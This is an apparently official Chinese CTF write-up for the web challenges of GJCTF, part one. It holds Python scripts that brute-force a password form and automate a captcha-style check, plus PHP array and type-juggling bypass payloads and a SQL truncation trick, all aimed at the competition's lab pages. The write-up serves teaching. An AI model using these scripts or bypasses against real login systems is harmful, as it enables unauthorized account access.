1.题目链接:http://www.czlgjbbq.top/GJCTF/brute.php 本题推荐使用python来暴力破解密码。脚本如下:
import requests
import re
s = requests.session()
html = s.get('http://www.czlgjbbq.top/GJCTF/brute.php')
session = ""
for i in range(12,28):
session = session + html.text[i]
session = session.replace(" ","")
for i in range(10000,99999):
payload = {'password':str(i), 'check':session}
print payload
html = s.get(url='http://www.czlgjbbq.top/GJCTF/brute.php', params=payload)
print(html.text)
注意运行结果,拿到flag.
2、题目链接:http://www.czlgjbbq.top/GJCTF/boom.php 利用数组来绕过加密。
Payload=number1[]=1&number2[]=2
文章图片
3、题目链接:http://www.czlgjbbq.top/GJCTF/number_question.php Payload=num=1ac
利用隐式类型转换绕过。
文章图片
4、题目链接:http://www.czlgjbbq.top/GJCTF/re_getflag.php Payload=key=key1keykeykeykeykey:///111keya@
文章图片
5、题目链接:http://www.czlgjbbq.top/GJCTF/login.php SQL约束攻击,注册传空格就好了。
文章图片
6、题目链接:http://www.czlgjbbq.top/GJCTF/inspect.php
文章图片
更改maxlength的值。
文章图片
传入足够大的值,直接拿到flag。
7、题目链接:http://www.czlgjbbq.top/GJCTF/strcmpass.php 【网络安全|GJCTF 官方WP WEB部分(1)】Payload=payload[]=1
利用数组=NULL绕过。
文章图片
8、题目链接:http://www.czlgjbbq.top/GJCTF/ihchange.php
文章图片
计算十六进制值,保证每一位都不在0到9之间。
Payload=password=0xffeeddaa
文章图片
9、题目链接:http://www.czlgjbbq.top/GJCTF/brute2.php 直接通过python脚本来写
import requests
import re
url = 'http://www.czlgjbbq.top/GJCTF/brute2.php'
time = 0
s = requests.session()
while True:
html = s.get(url)
pattern = '(\d+.*?\d+)'
ss = re.search(pattern, html.text)
info = ss.groups()[0].replace(" ", "")
password = eval(info)
html = s.get(url+'?info='+str(password))
if re.search('GJCTF{.*?}', html.text) is not None:
print html.text
break
time = time + 1
print time
运行后可以直接拿到flag值。
后面几道题的WP将在下次给出。
推荐阅读
- 联邦学习|【阅读笔记】Towards Efficient and Privacy-preserving Federated Deep Learning
- 微软去年安全业务收入150亿美元、新勒索软件以威联通设备为目标|1月27日全球网络安全热点
- 网络间谍自我感染远程木马、博客平台修补多个注入漏洞|1月11日全球网络安全热点
- 银行木马卷土重来、开发者破坏开源库影响数千应用程序|1月10日全球网络安全热点
- IE安全系列之——RES Protocol与打印预览(II)
- 110万个账户被黑客窃取、谷歌修复37个安全漏洞|1月6日全球网络安全热点
- Android网络安全之NetworkSecurityConfig
- 网络安全|网络安全入门之 Burp Suite 暴力破解 DVWA Brute Force Low
- Wireshark安装失败或找不到网络接口问题